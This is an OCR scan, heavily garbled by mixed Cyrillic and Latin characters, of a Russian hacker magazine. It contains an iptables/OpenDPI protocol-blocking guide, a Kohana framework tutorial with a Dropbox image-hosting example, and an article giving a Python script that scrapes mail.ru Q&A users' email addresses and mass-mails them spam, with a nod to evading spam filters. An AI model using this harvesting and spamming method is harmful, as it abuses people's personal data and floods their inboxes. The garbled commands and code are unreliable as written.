протоколов перешли отРАСЕкОрепПРІ: Р2Р, Зкуре, ѴоІР, ІМ, потоковое 
видео и аудио, сетевые игры и прочее (подробнее о ПРІ читай во врезке). 
Ставим необходимыедля сборки пакеты: 



$ зисіо ар1;-§е1; іп5І;а11 таке §сс ІіЬрсар-сІеѵ 



Скачиваем с сайта проекта орепбрі-1 .2.0.1;аг.д2 и орепбрі-пеібиег- 
\л/гаррег-1 .1 .Іаг.дг, а затем устанавливаем в соответствии с инструкциями 
внутри, незабыв наложить два патча: 



$ 1;аг -Х 2 -Р орепсІрі-пе1;1і11;ег-ыгаррег-1.1.1:аг.§2 
$ ссі орепсІрі-пе1:1і11:ег-ыгаррег-1.1 
$ 1;аг -Х 2 -Р . ./орепсірі-1.2.0.1;аг.§2 
$ ССІ орепсІрі-1.2.0 
$ ра1;сб -р0 < . ./ірд_таіп.б.сіі-р-р 




Ставим базы для ОеоІР 

$ раіісб -р0 < . ./ірр_рго1:осоІ5.б.сІі-р-Р 
Устанавливаем переменную среды: 

$ ехроП; ОРЕМОРІ_РАТН=$(рысІ) 

Но здесь есть проблемы. В документации сказано, что поддерживает- 
ся ванильное ядро (2.6.27-33), в остальных случаях ОрепПРІ может не 
собраться или работать нетак. На форуме проекта можно найти патчи 
для некоторых новых версий кернела. Например, по адресу сіск.ги/ 

ПѴѴІ8 доступен патч для 2.6.35 (такое ядро используется в последнем ЕТ 5 
ПЬипІи). Кроме этого в ядре должны быть установлены опции С 0 МЕ 16 _ 
МЕ_С 0 ММТРАСК_ЕѴЕМТ 5 и С 0 МЕ 10 _МЕ_СТ_МЕТиМК. В большинстве 
современныхдистрибутивовтаксделано поумолчанию. В ПЬипІи и 
некоторыхдругих.сопбд-файл лежит в каталоге /ЬооЕ Можнолегко про- 
верить. Берем патч, копируем его в орепбрі-пеібиег-уугаррег, применя- 
ем, а затем выполняем сборку: 

$ ССІ . ./ыгаррег 

$ раіісіі -рЗ < . ./орепсІрі-пе1:1і11:ег-ыгаррег-1.1_2.6.35_ѵ3.ра1;сб 
$ таке 

Если все равно получаем ошибку, тогда пробуем ванильное ядро версии 
2.6.33. Ставим модуль: 

$ Бисіо таке тосІи1е5_іп5І;а11 
$ зисіо ср ір1;/1іЬх1:_орепсІрі.50 /1іЬ/х1:аЫе5 

Загружаем и можем использовать: 

$ Бисіо тосІргоЬе х1;_орепсІрі 

Все доступные параметры можно получить, введя: 

$ Бисіо ір1:аЫеБ -т орепсірі --беір 

Выбираем нужный протокол (они также описаны вфайлеірд_рго1;осо[5_ 
озбрі.Ь) и блокируем его: 

ірІіаЫеБ -А РОКІЛІАКО -т орепсірі --Ьіііюггепі; -] ОКОР 

Это самый простой вариант, можно маркировать нужный трафик, чтобы 
затем использовать в шейпере. 

Заключение 

Используя сторонние наработки, можнолегко расширить стандартные 
возможности ірІаЫез, суідественно снизив риски для хоста или целой 
сети. Конечно, некоторое время придется затратить на создание и отлад- 
ку необходимых правил, но это впоследствии окупится сполна. 
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■ ■ Игорь «5рісІег_М ЕТ» Антонов |НіІр://ѵг-опІіпе.ги) 

Ш-ПРИЛОЖЕНИЯ 
С ТУРБОНШУВОМ 

Фреймворк КоЬара + шаблон 
проектирования МѴС = Іоѵе 

О Прошли те времена, когда было модно разрабатывать ѵ\^еЬ- 
приложения, состоящие из одного сценария, по уши напичканного 
кодом. На дворе 2011 год, и уже как-то несолидно придерживаться 
столь консервативных идей. Время двигаться вперед и отдавать 
предпочтение современным методам разработки - применению 
Сопіепі Мападетепі Ргатеѵѵогк. Сегодня я познакомлю тебя с 
одним из лучших представителей современных СМР. 

живаются никаких стандартов и хорошо зарекомендовавших себя 
решений, а делаютвее наобум. Они не думаютни о каких шаблонах 
проектирования, а просто лепят код. В большинстве случаевтакие 
программисты не способны заниматься большими проектами. 
«Грабануть поезд» (в смысле, сорвать небольшой куш, написав про- 
стенькое приложение) — это всегда пожалуйста. Сделают быстро и без 
лишнего шума. А ВОТС крупными делами у них возникают проблемы. 
Для проектов, ТЗ которых содержит фразу «должен быть масштаби- 
руем», такие «специалисты» не годятся, поскольку наколбасить кучу 
кода в одном модуле и забыть в таких проектах не получится. Тут нужен 
определенный подход и максимальное разделение кода. 

За годы развития языков программирования были созданы различ- 
ные методики — паттерны («шаблоны») проектирования ПО. Одним из 
таких паттернов и является Мосіеі-Ѵіеѵѵ-Сопігоиег. Я бы даже сказал, 
что сегодня это, наверное, самый популярный шаблон. 

Не буду ходить вокруг да около, а сразу перейду ксути. Если ты знаком 
с этим паттерном, то следуюідий раздел статьи можешь пропустить и 
перейти сразу к практике. Ну а тем, кто не в курсе, настоятельно реко- 
мендую уделить время теории, поскольку при разработке на КоЬапа 
тебе в обязательном порядке придется придерживаться шаблона 
МѴС. 

Контроллер 

Контроллер в МѴС выполняет роль некоего диспетчера- 
ре гул и ров иди ка. Он не должен изменять или добавлять данные, 
производить расчеты и т.д. Его цель — обслуживать поступаюидие 
запросы и на каждый такой запрос соответствуюидим образом 
отвечать. Например, пользователь обраидается к главной страни- 
це сайта нашего журнала — Ы:1:р://хакер.ги . Его запрос в первую 
очередь получает определенный контроллер (если рассматривать 
на примере шаблона МѴС). После получения запроса он выпол- 
няет действие, забинденное на данный тип запроса. Причем сам 
контроллер нив коем случае не должен содержать код для выборки 
данных и т.д. Сама выборка должна быть организована в модели. 



Что такое фреймворк? 

Сопіепі Мападетепі; Егатеѵѵогк (СМЕ) — набор инструментов для 
разработки систем управления контентом (Сопіепі Мападетепі; 
Зузіет). В отличие отСМЗ, фрейм ворки (в большинстве случаев) не 
готовы кработе сразу, посколькуони представляют собой лишьот- 
дельные кирпичики. Задача разработчика — набраться сил и сложить 
из этих материалов полноценное приложение. СМ5 — это тоже своего 
рода «кубики», но они готовы кработе из коробки и вполне могут функ- 
ционировать без доработки кода. 

Три главных плюса СМР 

Если отфреймворков не было особой пользы, то никто бы не решился 
использовать их в своих проектах — жизнь современного разработ- 
чика и та к достаточно тяжела. Из наиболее оидутимых плюсов СМЕ 
можно выделить: 

1 . Сптимизированный код. Над фреймворка ми трудятся разработчи- 
ки, удел я юидие оптимизации достаточно много времени. 

2 . Скажи «нет» велосипедам. Какправило, в фреймворке уже имеются 
готовые решения длятипичныхзадач.Туттебе и структура папок, 

и вспомогательные библиотеки, и куча всяких вкусностей. Многие 
веиди изначально готовы кработе и позволяют разработчику сразу 
приступить кразработке функционала приложения, не развлекаясь 
написанием кучи рутинного кода. 

3. Упроиденная командная работа. Если проект разрабатывается 
целой командой, то применение СМЕ (особенно популярного) дает 
оидутимый плюс при появлении в команде новенького. Ему будетпро- 
иде включиться в проект, так как для этого необходимо ознакомиться с 
СМЕ, по которому наверняка написано множество статей и мануалов. 

Святая троица: модель, представле- 
ние, контроллер 

Всех разработчиковусловно можно разделить на две большие группы 
— «гангстеры» и «законопослушные граждане». Первые не придер- 
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Модель 

В модели описывается вся бизнес-логика приложения. 
Выборки, модификация данных, расчеты — все это долж- 
но выполняться в модели, к которой и будет обращаться 
контроллер. Причем все сгенерированные в модели 
данные не должны содержать разметку. Только данные в 
сыром виде и ничего больше. 

Представление 

Последний компонент архитектуры МѴС — представле- 
ние. Этотэлементотвечаетза вывод данных в нужном 
виде. Именно во вьюшках (сленговое название представ- 
ления) и должна быть вся разметка. Несомненно, в них 
также может содержаться и программный код, отвечаю- 
щий сугубо за вывод данных, полученных от контроллера. 
Но никакой бизнес-логики там быть не может. 
Перспективы и плюсы использования МѴС очевидны. 
Помимо решения банальной задачи вроде отделения 
бизнес-логики от интерфейса ты автоматически полу- 
чаешь возможность комфортной командной разработки. 
Одни разработчики могутзаниматься совершенствова- 
нием моделей, другие — готовить представления и т.д. 

ТІіі$і$КоІіапа 

КоЬапа — это бесплатный фреймворке открытым ис- 
ходным кодом. В качестве шаблона проектирования, как 
ты уже и догадался, в КоЬапа применяется паттерн — 
МосІеІѴіеѵѵСопІгоиег. 

КоЬапа полностью объектно-ориентирована и использует 
в полной мере возможности последних версий интерпре- 
татора РНР. В отличие от многих бесплатных продуктов с 
открытыми сорцами, КоЬапа распространяется подли- 
цензией В5В, а не СРВ. Это подразумевает, что ты можешь 



ЧТО ПОЧИТАТЬ 



• Ы:1:р://доо.д[/5Р]оо — моя большая статья про 
СобеІдпіЩг. КоЬапа берет свое начало именно с этого 
проекта. Несмотря на крутизну КоЬапа, иногда не 
грех воспользоваться и СобеІдпВег’ом. Ктомуже, 
разработчики вроде бы опять возобновили разработку. 

• Ыірф/кобапаі'гаппеѵѵогк.огд/ — официальный сайт 
проекта КоЬапа. Здесь ты найдешь сам фреймворк, 

а также всевозможную документацию и примеры 
использования. После прочтения статьи рекомендую 
сразу посетить этот ресурс. 

• Ы:1:р://ѵг-опІіпе.ги — всегда свежие статьи по 
программированию. В плане СМР, ресурс может 
похвастаться наличием статей по Собеідпкег, Вгираі и 
т.д. 

• бирУ/кегкпезз.са/ѵѵікі/сІоки.рЬр — хорошая 
неофициальная документация по КоЬапа. 

применять данный продукт совершенно бесплатно какв 
личных, таки в коммерческих проектах. 

СтавиллКоИапа 

Для начала прогуляйся до официального сайта и загрузи 
последнюю версию фреймворка. Загруженный архив 
закачай ксебе на хости извлеки его содержимое. Попро- 
буй обратиться к директории своего хоста, в которую ты 
извлек фреймворк и... — приготовься к облому. Наверняка 
ты не пройдешь ЕпѵігоптепіТезІз (тест окружения). 




> СІѴСІ 

Все сорцы и стафф 
для разработки ждут 
тебя на диске. 




> ѵѵагпіпд 



Кстати, применение 
МѴС само по себе не 
сможет избавить тебя 
от проблем проекти- 
рования. Выход один 
— читать доки! 
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в моем случае тесты на запись в директорию хранения кэша и логов 
тоже завершились неудачей. Для исправления ситуации нужно всего 
лишь выставить права на запись для этих директорий. В обидем, вы- 
ставляй права и пробуй обновить страницу. В случаеуспеха увидишь 
текст: «Уоигепѵігоптепі; раззесі аіі гериігетепіз. Ретоѵе ог гепате 
іЬе іпзІаІІ.рЬр біе поѵѵ». Помимо радостного известия о готовности 
окружения для работы фреймворка, текстсообідения требует оттебя 
удаления файла іпзІаи.рЬр. Не будем брыкаться и выполним эту 
пустяковую просьбу. Удалив инсталляционный сценарий, попробуй 
обновить страницу. Если ты все сделал правильно, то браузер выплю- 
нетдевственно чистую страницу с текстом «ЬеНо, ѵѵогісі». 

НеІІоѵѵогІсІ на Кобапа 

Перед тем какперейти к рассмотрению полезного примерчика, по- 
пробуем наколбасить собственный «НеІІоѵѵогІсІ». Создадим новый 
текстовый файл и напишем в нем следуюідийтекст: 

<?рІір сіе1іпесі( '5У5РАТН' ) ог сііе( 'Мо сіігесі: 5сгір1; ассезБ. ' ); 
СІЭ55 Соп1;го11ег_Те5І; ех1;епсІ5 Соп1;го11ег { 
риЫіс -Рипсіііоп ас1;іоп_іпсІех() 

{ 

$1;ІіІ5->ге5роп5е->ЬосІу( 'Неііо ЫОГІСІ ! Неііо^ еѵегуопе ! ! ! ' ) ; 

} 

} 

В этом клочке кода я описываю наш первый контроллер — класс 
Соп1;гоиег_Те5І;, унаследованный отСопІгоІІег. Обрати внимание на 
имя класса. В имени содержится Сопігоііег (обязательный префикс), 
а после него идет непосредственно название контроллера. Его мы 
пишем с большой буквы. В моем случае именем контроллера является 
ТезЕ Контроллеры и модели должны храниться в директории Арр/ 
сІаззез/сопІгоНег и Арр/сіаззез/тосіеі. 

Создаем первую модель 

Пробный контроллерунасесть,теперьпосмотрим, какописываются 
модели. Сначала рассмотрим вариантмодели, которой нетребуется 
взаимодействие с базой данных. Например, представим, что нам 
нужно определить модель туЕігзіМосІеІ: 

с1а55 МосІе1_туРіг5І;МосІе1 ехЕепсІБ Мосіеі 

{ 

риЫіс -РипсЕіоп саісіі; (а^ Ь) { 
геЕигп а + Ь; 

} 

} 

В этой модели я объявил всего один метод — саІсІіО. Он выполняет 
операцию сложения над переданными в качестве параметра пере- 
менными. 

Увы, если требуется работать с базой данных, то модель та ко го вида 
не прокатит. Все модели, предназначенные для взаимодействия с 
СУБД, должны наследоваться от МосІе[_0а1;аЬа5е. Например, нам 
требуется написать модель, в которой предусмотрена возможность 
выборки данных изтаблицы изегз. Такая модель будет выглядеть 
примерно так: 

с1а55 МосІе1_туРіг5І;0ВМосІе1 ех1;епсІ5 0а1;аЬа5е_МосІе1 

{ 

риЫіс -РипсЕіоп 5е1ес1;0а1;а( ) { 

геЕигп -> сІЬ -> ^иегу( ' Беіесі: иБегNате^ 

раББ -Ргош иБегБ ' ); 

} 

} 

Делаем первое представление 

Ты знаешь, что представления в архитектуре МУС предназначены для 



отображения сгенерированного контента. Модель получает данные в 
сыром виде и возвраидает их контроллеру, а тот, в свою очередь, дол- 
жен передать их представлению. Уже во вьюшке создается красивая 
обертка, готовая к выводу пользователю. 

Все созданные представления должны храниться в папке ѵіеѵѵз, 
расположенной в директории твоего приложения. По умолчанию 
директорией приложения является Арріісабоп. Создавать представ- 
ления чрезвычайно просто. Ради эксперимента попробуем создать 
представление аЬоиС Его код будет выглядеть примерно так: 

<Іі1;т1> 

<ІіеасІ> 

<1;і1;1е><?ріір есбо $1;і1;1е ?></1;і1;1е> 

</ІіеасІ> 

Я специально не стал приводить остальную часть кода, так кактам 
может присутствовать абсолютно любой Ыті-код. Нас интересует 
только то, что расположено между тегами <1;іие>. Там я отправляю 
на «печать» значение одноименной переменной. Получается, что 
заголовок страницы будет уста на вливаться извне — из контроллера. 
Теперь посмотрим на обновленный код ранее рассмотренного нами 
контроллера: 

$аЬои1;_ра§е = Ѵіеы: :Тас1;огу( 'аЬоиІ;' ); 

$аЬои1:_ра§е -> 1:і1:1е = 'Это страница аЬоиІ:'; 

$1;Ыб -> гѳБропБе -> Ьосіу ($аЬои1:_ра§е) ; 

В первой строке я связываю переменную аЬои1;_раде с представле- 
нием аЬоиТ Для этого я использую конструкцию Ѵіеѵѵ::1'ас1;огу. Далее я 
устанавливаю переменную бИе и вывожу само представление. 

Хостинг изображений 

Я долго думал насчетпримера для сегодняшней статьи. Обычно 
при обзоре фрейм ворков пишут блог или другое типичное ѵѵеЬ- 
приложение. Признаюсь честно, сначала ятаки сделал — набросал 
блоге простой системой авторизации пользователей, админкой ит.д. 
Но потом подумал (вообш,е-то это я тебя насильственно переубедил 
:) — прим, ред.), что это скучно и решил сделать что-нибудь поинте- 
ресней. В итоге придумал рассмотреть такое приложение, какхостинг 
изображений. Таких проектов в инете пруд пруди, и несмотря на 
многообразие выбора, каждый имеетсвою аудиторию. 

Я понимаю, что для более-менее реального личного хостинга изо- 
бражений нужно несколько гигабайт места. На обычном виртуальном 
хостинге получить их дороговато, а раз так, то и пользы оттакого 
хостинга будетмало. Итутя подумал, а почемубы незаюзатьв ка- 
честве хранилиіда отдельный аккаунт известного всем ВгорЬох? По 
умолчанию каждый аккпозволяетхранить2 гигабайта стаффа, но его 
без особых проблем реально прокачать до восьми. А вот восемь гиг 
вполне хватит для использования в личных целях. Немного покумекав 
и в очередной раз задержав статью, я набросал небольшой проект. Я 
не стал сильно извраідаться, а реализовал лишь: 

• Удобную загрузку изображений. На большинстве опробованных 
мной хостингах изображений для отправки файловтребовалось 
выбрать нужный файл при помоіди стандартного диалога открытия 
файлов. Это не оченьудобно, тем более, возможности НТМЕ5 легко и 
просто помогаютреализовать Вгад&Огор-интерфейс и считать файл с 
компа пользователя при помоіди ЕіІеАРІ. 

• Передачу файлов в ВгорВох. Для хранения файлов я выбрал предо- 
пределенную директорию риЫіс. Все храняідиеся в ней файлы могут 
быть расшарены для других пользователей. ВгорЬох автоматически 
генериткним ссылки. Именно эта ссылка и будет использоваться для 
передачи клиенту. Да, конечный адресок получается длинноватым, но 
при желании его можно укоротить. Сервисы для укорачивания ссылок 
тебе в помоідь. 
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Иллюстрация наследования ресурсов 

Внутренности проекта 

Увы, привести полные листинги проекта в статье я не могу, по- 
скольку кода (особенно оформления) достаточно много. Здесь я 
лишь поясню основные ключевые моменты. Итак, начнем разбор с 
контроллеров. Для проекта мне потребовался один контроллер, одно 
представление и одна модель. В контроллере я объявил два метода- 
события. Первое возникает, когда пользователь обра вдается к основ- 
ной странице, а второе — в случаеуспешной загрузки изображения 
на сервер (генерируется страница со ссылкой на файл). 

Первое представление — самое простое. По факту, это — страница 
с небольшим полем, на которое нужно перетаскивать файлы. Код 
страницы прост до безобразия: 

<!ООСТУРЕ Іі1;т1> 

<Іі1;т1> 

<ІіеасІ> 

ктеТа сІіаг5е1;="и1:-Р-8"> 

<1;і1;1е>Демонстрация работы СМР Кобапа для ] [акера</1;і1;1е> 
<1іпк бге-Р="5І;у1е. С55" ге1="5І;у1е5бее1:" 1;уре="1:ех1;/с55" /> 



<5сгір1; 5гс="б1;т15ир1оасІег.]5"></5сгір1;> 

</беасІ> 

кЬосІу оп1оасІ="пеы ир1оасІег( 'сігор' ^ ' 5І;а1:и5 ' ^ ' иріоасіег. рбр ' ^ 
<сііѵ ісІ="Ьох"> 

<сііѵ ісІ="5І:а1:и5">Перетащи на меня файл</сііѵ> 

<сііѵ ісІ="сІгор"></сІіѵ> 

</сІіѵ> 

<сііѵ ісІ="1І5І;"></сІіѵ> 

</ЬосІу> 

</б1:т1> 

В коде я определяю простенькую разметку и подключаю готовую би- 
блиотеку Ытібиріоасіег. В этой ^5-библиотекеуже реализовано все 
необходимое для создания красивой Ытіб-страницы для передачи 
файлов на сервер. Для передачи файла достаточно забиндить на со- 
бытие опіоасі создание экземпляра объекта иріоасіег. 

В конструктор объекта необходимо передать следуюідие параметры: 
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Внутренности (фреймворка: реализация ОКЛЛ 



1 . ісі блока, на который пользователь будет выполнять перенос изо- 
бражений; 

2. ІСІ блока для вывода статусных сообщений; 

3. путь ксценарию, выполняющий передачу файлов от клиента на 
сервер; 

4. ІСІ блока для вывода списка загруженных файлов. 

Последний параметр можно не заполнять. Обрати внимание, к 
данному Ыт [-файлу я п рил и н ковал зіуіе.сзз. В нем содержится 
описание стилей. Если ты попытаешься повторить пример, то обя- 
зательно копирни с55-файл, иначе твоя страница так и останется 
девственно чистой. 

Теперь посмотрим, как работать с ОгорЬох. Как всегда есть два 
варианта. Первый — гиковский. Думаю, ты уже догадался, что 
придется все писать самостоятельно. Второй проще и правиль- 
ней — воспользоваться готовым модулем. Пока таких модулей не 
очень много. Для себя я выбрал самый простенький, который так и 
называется — ОгорЬохІІрІоасІег. Ссылку на его загрузку ты найдешь 
в конце статьи. 

Модуль представляет собой класс с одним полезным методом — 
иріоасі. Передача файлов в аккаунт ВгорВох’а выполняется следую- 
щим образом: 

$ир1оас1ег = пеы ОгорЬох11р1оас1ег( 'твой_логин ' ^ 

'твой_пароль' ); 

$ир1оас1ег->ир1оас1( 'файл для загрузки 'папка назначения'); 

Поскольку я решил загружать все файлы в папку риЫіс, то в качестве 
второго параметра мнетребуется передать — /рирЫіс. Если необхо- 
димо загружать файлы прямо в кореньаккаунта, то указывай просто 
слэш — ' / ' ■ 

Код приемки файла на стороне сервера выглядит следующим об- 
разом: 

і-Р(соип1;($_РІІЕ5)>0) 

{ 

$ир1оас1ег = пеы ОгорЬох11р1оас1ег( ' 1о§іп ' ^ ' разз ' ) ; 
$ир1оас1ег->ир1оас1( 



$ир1оас1_-Ро1с1ег. '/' .$_РІІЕ5[ 'иріоасі' ][ 'паше' 
$с1горЬох_-Ро1с1ег) ; 

і-р(тоѵе_ир1оасІесІ_1і1е($_РІІЕ5[ ' иріоасі ' ] [ '1:тр_пате ' ] ^ 
$ир1оас1_-Ро1с1ег. '/' .$_РІІЕ5[ ' иріоасі '][' пате ' ] ) ) 

{ 

есбо 'сіопе' ; 

$ир1оас1ег = пеы ОгорЬох11р1оас1ег( ' 1о§іп ' ^ ' разз ' ) ; 
$ир1оас1ег->ир1оас1( 

$ир1оас1_-Ро1с1ег. ' / ' .$_РІІЕ5[ ' иріоасі ' ] [ ' пате ' ] ^ 
$с1горЬох_-Ро1с1ег) ; 

} 

ехі1:(); 

} 

Здесь я привел код считывания файла с использованием глобально- 
го массива $_Е1ЕЕ5. С ним оченьудобно и просто работать, но стоит 
помнить об одном маленьком условии — браузер клиента обязан 
поддерживать метод передачи файлов — зепсІАзВіпагуО. В против- 
ном случаетебе придется самостоятельно декодировать полученные 
данные из Ьазе64 (если они были закодированы именно этим алго- 
ритмом). Я реализовал оба варианта. Второй ты можешь посмотреть 
в моем исходнике. 

Заключение 

Фреймворки существенно облегчают процесс разработки ѵѵеЬ- 
приложений и прививают разработчику «культуру разработки», 
помогаютписать более красивый и правильный код. Рассмотренная 
Кобапа обладаетвесьма привлекательными возможностями и уже 
из коробки содержит готовые решения длятипичныхзадач. Попро- 
буй начать использовать Кобапа в реальных проектах. Уверен, ты 
прочувствуешь ее мощь и гибкость и уже не захочешь возвращаться 
на голый рбр. На этом кланяюсь и желаютебеудачи. Какобычно, все 
свои вопросы можешь кидать на мыло. -и- 
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реклама 



Г5Р ©РОУР 




Р$Р МВ 090 



Р8Р - заряжает мобильность и качество 




Компания Р8Р 
приготовила Вам подорок 
к отпуску — новый сетевой 
адоптер для ноутбука 
Р8Р МВ 090! 




Официальные дистрибьюторы РЗР в России: 



Коосіоо 

ТЕСНМ0ШСІЕ5 

\л/\л/\л/.коос1оо.ги 



осз 

ОІЗТРІВУТІОЫ 

\л/\л/\л/.ос5.ги 




+7 (495) 221-1111 
\л/\л/\л/.оІсІі.ги 



Высокая производительность, надежность, 
практичность, мобильность, безопасность 
и, конечно же, элегантность сделают 
нош адаптер Вашим постоянным спутником. 
Возьмите адаптер РЗР МВ 090 с собой в дорогу 
вместо громоздкого и тяжелого оригинального 
сетевого адаптера, Ваше путешествие, робота 
и отдых станут еще более комфортными! 

ѵѵ ѵѵ ѵѵ р - р О ѵѵе Г . Г и 






СООІЫ6 



■ ■ Александр «ЬегНеізсЬ» Перечнев (ѵѵѵѵѵѵ.регесЬпеѵ.сот) 




Испрльзуем невнимательноаь руководава 
таі1.ш в своих целях 



о к сожалению (а может быть, и к счастью), создатели даже 
в самых крупных сервисах допускают просчеты. В этой статье я 
расскажу, как с помощью одного из них устроить себе бесплатную 
таргетированную рекламу, со страшной силой залетающую на 
почтовые ящики посетителей оіѵеітаіі.ги. 



Предыстория 

Однажды мне потребовалось привлечь новых посетителей на форум. Так 
какфорум был чисто экспериментальным и бесперспективным, вклады- 
вать деньги в рекламу я не хотел. Поэтому первое, что пришло мне в голову 
— попробоватьнемного попиаритьего на оІѵеТппаіІ.ги . Послеотправки 
пары-тройки ответов со ссылкой на мой сайт модераторы тутже удалили 
сообідения и запретили мне доступ к ресурсу. Я зарегистрировал новый 
аккаунт, но продолжать в том же духе было суідей глупостью — мне пред- 
стояло хорошенько подумать над автоматизацией этого процесса. 

Итак, первое, что я сделал — нажал в браузере заветную комбинацию 
<с1;г[+и> и стал читать НТМІ-код страницы. В начале следовали стан- 
дартныетэги, совершенно мне не интересные. Далее я увидел тексттех 
самых вопросов, которые задают пользователи, и тутже мне на глаза 



стали попадаться какие-то етаіі-адреса. В голове промелькнула мысль: 
это могут быть адреса пользователей, задаюідих вопросы. Вниматель- 
ный просмотр главной страницы сервиса подтвердил мои догадки, после 
чего я открыл свой десііі; и стал кодить. 

Пишем скрипт 

Программировать мы будем на РуіЬоп. Если ты никогда не работал с ним 
— не пугайся. В рамках статьи все будет очень просто. 

Для начала давай соберем все етаіі-адреса с главной страницы какого- 
нибудь раздела сервиса. Для этого нам потребуется модуль «и гШЬ» 
для загрузки веб-страниц посредством НТТРи модуль «ге» для работы 
с регулярными выражениями. Подключим их в самом начале нашего 
РуіЬоп-исходника: 
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поносѣ' таіі 7^"^ 



I Сейчас чщуі в Интернете^ 

I Ш 

коіипьютерньш 
^ Ш 

^ Разоблачения ог Навального 
нее а 
ЕйШШ 

I речь Парфенова 
буквоед 
I сйк зенит 



Новости проекта 

• Зшднее снижение нені 

• ч^ТМР? Г^?Д^ 

• Понятнее? РР^ЭНЛЙ 



неі 4)0 Е« 





Ф Анна Чѵгіосова О Р ответов нет 16 секунд наэа 

Какой РОД цо ѣ Минске самый лучший? -* Беое 
# Евгения Лепхова О О ответов нет 20 секунд нв 



Как В домашних условиях отличить спред от> 

Ф Юрий Шѵмля некий О О ответов нет 23 секунды 

Задача по физике про электрический ток - Ву: 

# Меіо О О ответов нет 23 секунды назад 

дайте ссыпку на сейв на тоб! уѵапіес^ до баро 

^ (иао Еооег ііе Сегѵаітіеа Заѵа^^ега О ^ ответов нет 

Жульен в микроволновке? Кто-то пробовал.аі 

9 Танекд Бонда О О ответов нет 24 секунды нээ- 



@ Дрі^і^ит^ а 

Имеет ЛИ праі Й^напкквіі^г 



9 АяександоаВе 



письмо 

Отправить ОТКРЫТКУ 
Добавить в ДРУЗЬЯ 



с у от вое 



И» р ѴА^п >пп аіі н ги/с ді - Ьіп/5еп1тзд ?Тс^1а пе камбал @таі кги ^[^гопп = ѵе^ 

|Цап:/и5г/1о^Д ^^^Апика - МеШвап^Р^'^^ Р^^тветы@МаікРііг Челове... | ^ врат.оѵеГтаІги^кт {-.>. [ДІ тс| 

Тот самый етаіі пользователя 



ітрогі; игІИЬ 
ітрогі; ге 

Далее сценарий работы предельно прост: открываем ѵѵеЬ- 
странцу, ищем на ней все мыльники и используем их в своих 
целях. На питоне это будет вы глядеть следующим образом: 

ыбііе Тгие: 

и = иг11іЬ.иг1ореп("б1;1;р://о1:ѵе1:.таі1.ги/і1;/") 
ра§е = и.геасІО 
етаі1Ра1;1:егп = 

г"[0-9а-2А-2_\-\. ]+@[0-9а-2-А-2\. ]+. [а-2А-2]+" 
сотрі1есІРа1:1:егп = ге.сотрі1е(етаі1Ра1:1;егп) 

■Рог асІсІгезБ іп сотрі1есІРа1;1:егп.1іпсІа11(ра§е) : 

# Делаем что-нибудь 

По адресу бир://о1:ѵе1:.ппаі[.ги/і1:/ размещаются все вопросы, 
связанные с компьютернымитехнологиями. Еслиты, напри- 
мер, захочешь получить етаіі-адреса людей, интересую- 
щихся спортом —замени его на Ы:1р://о1:ѵе1.ппаі[.ги/5рог1:/ . 
Далее в переменную етаіІРаиегп мы помещаем регулярное 
выражение, содержащее шаблон етаіі-адреса. Отом, как 
строятся регулярные выражения я рассказывать не буду 
— эта тема выходитза рамки статьи. Просто вбей в Ооодіе 
соответствующий запрос и узнай о регулярных выражениях 
все, что твоей душе будетугодно :). 

В следующей строке мы компилируем регулярку в удобный 
для интерпретатора вид и подходим кзаветной конструкции: 

■Рог асІсІгеББ іп сотрі1есІРа1;1;егп.1іпсІа11(ра§е) : 

В данной строчке в первую очередь выполняется метод 
бпбаііобъекта сотріІебРаНет. Данный метод ищетвее 
строки в параметре раде, которые соответствуютзаданному 
нами регулярному выражению. В нашем случае методбпбаіі 
вернетсписокетаіі-адресов, содержащихся на странице 
Ы:1:р://о1:ѵе1.таі1.ги/і1:/ . 

Блок, находящийся под строкой 1"ог<значение> іп <кол- 
лекция>, выполнится столько раз, сколько етаіі-адресов 



содержится на странице, и при каждом проходе в перемен- 
ной аббгезз будет содержаться адрес очередного почтового 
ящика. Это значит, что в этом блоке и будут совершаться 
все злодеяния, которыетолько способны прийти нам в 
голову. Давай будем отправлять на каждый почтовый адрес 
«нежелательное» сообщение. Для этого инициализируем 
несколько глобальных переменных, расположив их между 
главным циклом и импортом библиотек: 

5гп1;р_5егѵег = "5гп1:р.таі1. ги" 

5Гп1;р_рог1; = 25 

5іті1;р_асісіге55 = "піскпате@таі1. ги" 

5іті1;р_ра55ыогсІ = "ра55ы0гс1" 
таі1_1:оріс = "Спам сообщение" 
таі1_ЬосІу = "3дравствуйте^ я прислал вам 
спам- сообщение. Добавьте меня ^ пожалуйста^ 
в черный список. " 

Здесьу нас все предельно ясно — названия переменных 
говорят сами за себя. Теперь реализуем непосредственно 
отправку сообщения адресату. Для этого добавим кое-что в 
списокимпорта: 

ітрогі; БтірІіЬ 

■Ргот етаіі. МІМЕТехІ; ітрогі МІІМЕТехі 

...и впишем нижеследующий код в блок конструкции «Ьг- 
іп», чтобы он выполнялся для каждого найденного етаіі- 
адреса: 

т5§ = МІМЕТех1;(таі1_ЬосІу + асІсІгеББ^ ""^ "иі^Р-В") 

тБ§['Ргот'] = Бт1;р_асІсІгеББ 

тБ§[ 'То' ] = асІсІгеББ 

тБ§[ 'ЗиЬдесІ;' ] = етаі1_1;оріс 

таіІЗегѵег = Бт1;р1іЬ.5МТР(Бт1;р_Бегѵег^ Бт1;р_рог1;) 
таі15егѵег.1о§іп(Бт1;р_асІсІгеББ^ Бт1;р_раББЫогсІ) 
таі15егѵег.БепсІтаі1(Бт1;р_асІсІгеББ^ асIсIгеББ^ 
тБ§.аБ_БІ;гіп§()) 
таіІЗегѵег . сІ0Бе( ) 
иБесІЕтаіІБ.аррепсІ(асІсІгеББ) 




Даже такой простой 
скрипт в течение двух 
месяцев приносил 
мне от 100 посети- 
телей в день в зави- 
симости от раздела. 
Сейчас спам-фильтры 
немного поумнели, 
но для их обхода до- 
статочно рекоменда- 
ций из абзаца «Обход 
спам-фильтра». 




> СІѴСІ 

Полный исходный код 
скрипта ты найдешь 
на диске, который 
идет вместе с жур- 
налом. 




> ѵѵагпіпд 

Эта статья — всего 
лишь адекватная 
реакция на наплева- 
тельское отношение 
руководства таіі. 
ги к данным своих 
пользователей. Вся 
информация — впол- 
не общедоступная и 
ничего противозакон- 
ного в ней нет. 
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СООІЫ6 



ШюіСТи 

национальная почтовая служба 



Сделать стартовом Д С телефона: т.тай.ги 




Сейчас ищуі: Медвеаев и Путин в шортам ▼ 






Создать почту 

Неограяиченный объем, защита от спама и 
вирусов 



8 салонах дилеров Ыіззап 




^ @ 

Мой мя | ) Агент Игры Знакомства 



^ Приложения 
Г ороскопы 
0 Новости 



® Видео 
Открытки 
П* Погода 



Налл рассказывают про защиту от спалла :) 






